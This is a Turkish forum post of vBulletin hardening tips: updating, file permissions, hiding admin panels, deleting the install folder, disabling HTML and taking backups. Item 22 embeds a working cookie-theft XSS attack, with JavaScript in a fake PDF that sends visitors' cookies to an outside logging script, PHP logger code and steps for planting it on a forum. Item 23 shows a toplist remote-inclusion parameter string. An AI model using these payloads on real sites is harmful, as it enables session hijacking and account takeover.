- 10 Şub 2015
- 2,734
- 0
-- vbulletin güvenlik açıkları ve kapatma Yöntemleri --
1- İlk olarak her zaman için forumunuzu son çıkan vbulletin sürümüne upgrade edin daha güvenlidir.
2-Herhangi bi eklentide php dosyası veya php dosyalarında editleme varsa iyice dikkat edin sonradan açık teşkil edebilir.
3-Ftp nize girin ve tüm dosyalarının chmod değerlerinin 777 olmamasına dikkat edin çünkü fso ile serverınıza girilirse hacklenmeyin adam yazma hakkı bulamaz kurtulmuş olursunuz.
4- Config.php dosyanızı mutlaka kriptolayınki herhangi bi fso ile girildiğinde sql bağlantı için kimse okuyamasın.
5- Eğer phpmyadmin kullanıyorsanız phpmyadmin adresinizin şifreli olduğundan emin olun değilse şifreleyin.
6- Admincp ve modcp klasörlerinizin ismini değiştirin vede şifreleyin o klasörleri.
7-Çok basit şifreler kullanmayın şifrelerinizde &%+/ gibi özel karekterlerin olmasına özen gösterin
8-Trojen yerseniz mutlaka hemen format atın ve tüm ftp +panel v.s şifrelerinizi değiştirin
9-Forumu kurduktan sonra mutlaka install klasörünü silin sadece install.php yi değil zaten herhangi bir işlevi olmıyan klasör komple silin ileriki zamanlarda açık teşkil etmesin.
10-Mutlaka hergün sitenizin yedeğini alın herhangi bi sorunla karşılaşırsanız yedeği geri yükleyip ufak bir zararla atlatırsınız.
11- Calender(Takvim) i silin biri oraya Hacked by ****** gibisinden bişeyler ekliyerek lamerlik yapabilir.
12-Shoutbox kullanıyorsanız mutlaka html ve images ları kapatın bunlar açık teşkil ediyorlar.
13-Eğer yedeği ftp nize yollayıp ordan bilgisayarınıza çekiyorsanız yedek aldıktan sonra mutlaka ftp nizden silin çünkü yedek alınması için klasörün chmod u 777 dir ve isteyen herkez yedeği bilgisayarına indirebilir.
14- imzada html kodlarını kapatın bu yöntemle xss veya yönlendirme yapılabilir.
15- Üye olurken mutlaka resim doğrulaması olsun eğer hostunuzdan doğan bir image sorunu varsa herhangi zorunlu bir ek bilgi ekleyinki siteniz flood saldırısına maruz kalmasın.
16- Herhangi bi konuda TIKLA gibisinden yazılara direk tıklamayın önce sağ tıklayıp özelliklerden linke bakın ondan sonra tıklayın.
17-Özel mesajlarda çok özelliğin açık olmasına gerek yok cookieslerinizin güvenliği açısından özel mesajdaki özellikleri kapatın image v.s
18-Yeni kullanıcı grup eklerken bu uye grubu halka acık olsunmu seçeneğini mutlaka hayır yapın diğer kullanıcılar bu grubu seçemesin.
19-Eğer null sürüm kullanıyorsanız dosyalara dikkat edin null iken kişi sizin bilgilerinize ulaşmak için açık kapı bırakmış olabilir ör: 3.5.3 sürümündeki sm-check.php dosyası.
20-eğer topx kullanıyor kullanıyorsanız yönlendirme yemediğinden emin olun herhangi biri indexine yönlendirebilir [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...] örneğin burdaki kod o yüzden eğer topx iniz yönlendirme yiyosa yönlendirme kodundaki kelimeleri sansürleyin vede en garanti yol olarak açıksız topx ler var onu kullanın
21-Eğer toplistinizi eklenti olarak kullanıyosanız html kodlarının kapalı olmasına dikkat edin çünkü yönlendirme koduyla indexe yönlendirilebilir.
22- Gelelim eklentiden doğan xss açığına
Notepad ile yeni bir dosya açıp aşağıdaki kodu içine yapıştırın ve testmagic.pdf olarak kaydedin.
Code:
**********
d o c u m e n t.write('<img src="http://host adresiniz/c.php?c='+********.cookie+'" WIDTH=0 HEIGHT=0>');
********.********.href="https://www.google.com/adsense/testmagic.pdf";
</script>
Aşağıdakini de c.php olarak kaydedip bir host a atın.
Code:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer= getenv ('HTTP_REFERER');
$fl = fopen('megalog.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer."\n".$cookie."\n");
fclose($fl);
?>
Nasıl kullanılacağına geçelim :
vbulletin 3.5.4 kullanan bir foruma üye olup mesajımızı yazıyoruz. daha sonra yazdığımız mesaja testmagic.pdf i ekliyoruz. eğer o sitede açık varsa mesajı gören kullanıcıların cookie si hostunuzdaki log.txt e kaydedilecek.
Kodlardaki bazı adresler yerine biliyorsunuz ki kendi adreslerinizi yazacaksınız.Bu açık sadece IE kullananlarda geçerlidir.
işte eklentiden doğan xss açığı böyle kapatmak için pdf türü eklentiyi silmelisiniz.
23-Diğer vbulletin toplist açığıda şöyle [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...][Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]?
bu şekilde biri sitenize fso ile uzaktan bağlantı kurabilir bunun için join.php deki FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path] kodunu silmeniz gerekmektedir.http://www.hedefsite.com/toplist/sources/join.php?FORMhttp://www.hedefsite.com/toplist/sources/join.php?FORM
> vBuLLetin güvenlik Önlemleri <
1 : vBulletin kurulum bittikten sonra " install " klasörünü tamamen FTP den silin.
2 : Config Editleyerek Kendinizi güvenliğe alın ..
FTP den config.php yi indirin ve notepad yardımı ile açın.
Burada kullanıcı id numaranızı yazın.
Kod:
$config['SpecialUsers']['undeletableusers'] = ' id numaranı yaz ';
Eğer bunu yapariseniz şifreniz çalındıgında kullanıcı adınız bile değişmez..
3 : Admin & Moderatör panellerini saklayın.
FTP den " admincp " " modcp " isimlerini değiştirin.
http://www.siteadi.com/forum/birincicp
http://www.siteadi.com/forum/ikincicp
Gibi değiştirin..
Değişiklikleri yaptık config.php yi notepad yardımı ile açıyoruz.
Kod:
$config['Misc']['admincpdir'] = 'admincp';
$config['Misc']['modcpdir'] = 'modcp';
Bunun yerine şöyle yazıyoruz.
Kod:
$config['Misc']['admincpdir'] = 'birincicp';
$config['Misc']['modcpdir'] = 'ikincicp';Not : Birincicp ve ikincicp olan yerleri istediginiz ismi veriniz...ftp'de ismi degistirmeyi unutmayiniz...
Buda tamamdır. Devam edelim.
4 : PaneLLere Şifre Koyun.
:::::BİRKAC GENEL BİLGİ ::::::
1: Forumunuzu daima en yüksek sürümlere upgrade edin.
2: Tools.php dosyasının (vB3) websitenizde bulunmadığından emin olun. Bu dosya kesinlikle upload edilmemelidir. İşi bittikten sonra silinmelidir.
3: phpMyAdmin kullanıyorsanız, giriş kısmının şifrelendiğinden emin olun. Aksi taktirde herkes ulaşabilir.
4: Herhangi bir saldırıdan sonra tüm cpanel, FTP ve admin şifrelerinizi değiştirin.
5: Admin ve mod şifrelerinin en az 9-10 karakter olmasına, bu karakterlerin sayı ve harflerden oluşmasına dikkat edin. Şifreleriniz MD5 şeklinde şifrelendiği için hem harf hemde rakamla oluşan 10 karakterli bir şifrenin çözülmesi imkasız bile olabilir.
6: FORUMUNUZDA ASLA HTML KULLANIMINA İZİN VERMEYİN.
7: Sitenizi sağlam hostlara kurun. Forumunuz ne kadar güvenli olursa olsun hostunuz saldırı yediği zaman sizde etkileneceksiniz.
8: Sık sık DATABASE yedeği alın. Bazı Hosting firmaları her gün yedek alım işlemlerini gerçekleştirmektedir. Ben ayda 8-9 kez yedek alıyorum. Böylece saldırı yiyip, tablolara ve foruma herhangi bir zarar gelirse 1-2 günlik zararlıkları atlatıyorum.
Plugin eklenti fln yüklemeyin diyorlar bence yanlış
Eklentilerde sadece php dosyası olan eklentilere dikkat ediniz.
Bazıları o php dosyalarına değişik kodlar ekleyebilir... bilginize. sağlam yerlerden alır iseniz sorun yok.
Sıfır bi vBulletin hacklemek oldukça zordur. Ama serverınızda açık var ise istediği kadar zor olsun Serverınıza dikkat edin.
